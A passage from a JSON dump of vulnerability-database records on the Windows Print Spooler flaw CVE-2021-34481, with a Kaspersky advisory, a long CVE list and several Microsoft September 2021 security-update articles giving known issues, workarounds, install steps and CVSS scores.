"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-18T13:12:53", "id": "HIVEPRO:1C413EFAC97AED19F9E35574668008F9", "href": "https://www.hivepro.com/werent-you-warned-about-reactivating-the-print-spooler/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-05-23T16:31:04", "description": "### *Detect date*:\n07/15/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn elevation of privilege vulnerability was found in Microsoft Products (Extended Support Update). Malicious users can exploit this vulnerability to gain privileges.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 R2 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) 
"CVE-2020-1241", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-21T00:00:00", "id": "KLA11807", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). 
\n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. 
When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006729](<https://support.microsoft.com/help/5006729>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007255](<https://support.microsoft.com/help/5007255>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. 
**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006729](<https://support.microsoft.com/help/5006729>). If after installing [KB5006729](<https://support.microsoft.com/help/5006729>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. 
\nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005627>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005627](<https://download.microsoft.com/download/6/3/a/63a7a18b-4013-4336-b8a9-b78228da6198/5005627.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005627 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005627", "href": "https://support.microsoft.com/en-us/help/5005627", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005099](<https://support.microsoft.com/help/5005099>) (released August 10, 2021) and addresses the following issues:\n\n * This update contains miscellaneous security improvements to internal OS functionality. 
No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006739](<https://support.microsoft.com/help/5006739>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. 
Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007260](<https://support.microsoft.com/help/5007260>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006739](<https://support.microsoft.com/help/5006739>). If after installing [KB5006739](<https://support.microsoft.com/help/5006739>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). 
\n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005623>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005623](<https://download.microsoft.com/download/f/e/b/feb6fda1-9d2a-40d5-9264-23b033a84e00/5005623.csv>). 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005623 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005623", "href": "https://support.microsoft.com/en-us/help/5005623", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:30", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. 
Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. 
\nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006732](<https://support.microsoft.com/help/5006732>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. 
The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007245](<https://support.microsoft.com/help/5007245>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006732](<https://support.microsoft.com/help/5006732>). If after installing [KB5006732](<https://support.microsoft.com/help/5006732>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005607>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005607](<https://download.microsoft.com/download/7/9/4/7944449d-0157-49a0-85ae-be5be2970e5a/5005607.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005607 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005607", "href": "https://support.microsoft.com/en-us/help/5005607", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:30", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). 
To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005090](<https://support.microsoft.com/help/5005090>) (released August 10, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code signing signature.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006736](<https://support.microsoft.com/help/5006736>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. 
Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007263](<https://support.microsoft.com/help/5007263>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different time zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006736](<https://support.microsoft.com/help/5006736>). If after installing [KB5006736](<https://support.microsoft.com/help/5006736>) you still receive the prompt every time you print, see Q1 in the \"Frequently asked questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). 
\n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update](<https://www.microsoft.com/cloud-platform/extended-security-updates>) (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. 
To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005606>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005606](<https://download.microsoft.com/download/1/4/7/147d3470-0e5e-48f9-888f-61e2094f4921/5005606.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005606 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005606", "href": "https://support.microsoft.com/en-us/help/5005606", "cvss": 